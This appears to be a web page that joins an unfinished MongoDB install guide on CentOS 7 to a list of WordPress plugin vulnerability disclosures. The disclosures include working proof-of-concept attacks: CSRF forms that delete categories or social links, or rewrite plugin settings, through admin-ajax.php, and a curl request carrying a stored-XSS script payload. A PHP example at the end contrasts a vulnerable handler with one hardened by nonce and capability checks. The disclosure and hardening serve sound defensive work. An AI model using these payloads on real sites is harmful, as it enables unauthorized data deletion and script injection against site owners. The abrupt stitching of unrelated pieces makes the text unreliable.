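I recently needed MongoDB for a project, so here is a quick walkthrough of installing it.

First, configure the MongoDB repository by creating the repo file:

    vi /etc/yum.repos.d/mongodb-org-4.2.repo

with the following contents:

    [mongodb-org-4.2]
    name=MongoDB Repository
    baseurl=https://repo.mongodb.org/yum/redhat/$releasever/mongodb-org/4.2/x86_64/
    gpgcheck=1
    enabled=1
    gpgkey=https://www.mongodb.org/static/pgp/server-4.2.asc

Then install with yum:

    yum install -y mongodb-org

After a few minutes the installation completes. Start the MongoDB service:

    systemctl start mongod.service

Port 27017 also needs to be opened. CentOS 7 no longer has iptables, so firewalld needs to be installed:

    firewall-cmd --zone=public --add-port=27017/tcp --permanent

The --permanent flag keeps the rule from being dropped again when the server restarts.

MongoDB is now installed and running. By default MongoDB only accepts local connections; next we modify bindIp so that it can be reached remotely …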
WordPress Read more By Adam plugin <= 1.1.8 - CSRF vulnerability
For full details of the vulnerability, see: https://patchstack.com/database/vulnerability/read-more/wordpress-read-more-by-adam-plugin-1-1-8-cross-site-request-forgery-csrf-vulnerability
WordPress Add Shortcodes Actions And Filters plugin <= 2.0.9 - XSS vulnerability in the admin dashboard
PoC: Dashboard -> Tools -> Shortcodes, Actions and Filters -> Add New -> fill the name with "> and fill the other fields with any value, then click the "Save" button. Once that is done, the stored XSS is in place. The root cause is that special characters such as > are not filtered, which results in stored XSS.
WordPress YDS Support Ticket System plugin <= 1.0 - CSRF vulnerability
The CSRF vulnerability is caused by missing permission checks and missing nonce verification. PoC:

    <html>
    <body>
    <form action="http://localhost/new/wp-admin/admin-ajax.php?action=deleteCategory" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="catId" value="1">
    <input type="submit" name="Submit">
    </form>
    </body>
    </html>

Once the form is submitted, the value of catId is modified.
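WordPress PCA Predict plugin <= 1.0.3 - XSS vulnerability in the admin dashboard
Special characters are not filtered, which leads to XSS in the admin dashboard. PoC: Dashboard -> Settings -> PCA Predict -> enter this string: "> and then save to see the XSS.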
WordPress add2fav plugin <= 1.0 - XSS vulnerability
Some characters are not filtered, so an attribute can be closed early, which results in XSS. PoC:

    curl 'http://exsample.com/wp-admin/options-general.php?page=add2fav_uid' --data 'add2fav_hidden=Y&add2fav_label_add=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&add2fav_label_rem=Remove+from+Favorites&add2fav_label_reg=&add2fav_label_off=%23&Submit=Save+Changes'
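WordPress WP Shop plugin <= 3.9.6 - CSRF by any user leading to data update and deletion
The AJAX actions have no effective permission check and no nonce verification, so any user can change the plugin's configuration and delete some important data. For details, see: https://patchstack.com/database/vulnerability/wp-shop-original/wordpress-wp-shop-plugin-3-9-6-unauthenticated-plugin-settings-change-data-deletion-vulnerabilities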
WordPress Add User Role plugin <= 0.0.1 - XSS vulnerability
Some special characters are not filtered, so closing characters can be injected, which leads to XSS. PoC: Dashboard -> Users -> My Role -> Create new user -> fill the Role Name with "> and then click "add user".
access-code-feeder < 1.0.3 - CSRF with subscriber privileges leading to plugin update
PoC:

    <html>
    <body>
    <form action="http://localhost/new/wp-admin/admin-ajax.php?action=base_url_action" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="new_url" value="http://www.google.com">
    <input type="submit" name="Submit">
    </form>
    </body>
    </html>

Vulnerability details: https://patchstack.com/database/vulnerability/access-code-feeder/wordpress-access-code-feeder-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability
about-me <= 1.0.12 - CSRF with subscriber privileges leading to plugin configuration update
PoC:

    <html>
    <body>
    <form action="http://localhost/new/wp-admin/admin-ajax.php?action=social_links_delete_network" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="linkId" value="1">
    <input type="submit" name="Submit">
    </form>
    </body>
    </html>

Once it runs, the social network account with ID 1 is deleted outright.
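
The CSRF entries above (YDS Support Ticket System, WP Shop, access-code-feeder, about-me) share one root cause: an admin-ajax.php action with no nonce verification and no capability check. The following is an added example, not code from any of these plugins, showing that pattern next to a hardened handler for the deleteCategory / catId request from the YDS PoC. The demo_* function names, the demo_categories table and the manage_options requirement are assumptions.

```php
<?php
// Added example. Hypothetical plugin code: the demo_* names, the demo_categories
// table and the manage_options requirement are assumptions for illustration.

function demo_delete_category( $cat_id ) {
    global $wpdb;
    return $wpdb->delete( $wpdb->prefix . 'demo_categories', array( 'id' => $cat_id ), array( '%d' ) );
}

// BEFORE: reachable by every logged-in user (subscribers included) through
// admin-ajax.php, with no nonce and no capability check. Shown for contrast, not hooked.
function demo_delete_category_vulnerable() {
    demo_delete_category( absint( $_POST['catId'] ) );
    wp_die();
}

// AFTER, part 1: the admin form carries a nonce bound to this action and the current user.
function demo_render_delete_form( $cat_id ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="deleteCategory">';
    echo '<input type="hidden" name="catId" value="' . esc_attr( $cat_id ) . '">';
    wp_nonce_field( 'demo_delete_category' ); // emits the hidden _wpnonce field
    submit_button( 'Delete' );
    echo '</form>';
}

// AFTER, part 2: the handler rejects requests without a valid nonce or capability.
add_action( 'wp_ajax_deleteCategory', 'demo_delete_category_hardened' );
function demo_delete_category_hardened() {
    // CSRF: a forged cross-site form cannot supply a valid nonce.
    // Third argument false makes check_ajax_referer() return false instead of dying.
    if ( ! check_ajax_referer( 'demo_delete_category', '_wpnonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce' ), 403 );
    }
    // Authorization: a nonce alone does not stop a low-privileged user.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }
    // Input: accept only a positive integer id.
    $cat_id = isset( $_POST['catId'] ) ? absint( wp_unslash( $_POST['catId'] ) ) : 0;
    if ( 0 === $cat_id ) {
        wp_send_json_error( array( 'message' => 'Bad catId' ), 400 );
    }
    demo_delete_category( $cat_id );
    wp_send_json_success( array( 'deleted' => $cat_id ) );
}
```

Both checks are needed: the nonce stops forged cross-site requests, and the capability check stops a subscriber who obtains a valid nonce from calling the action directly.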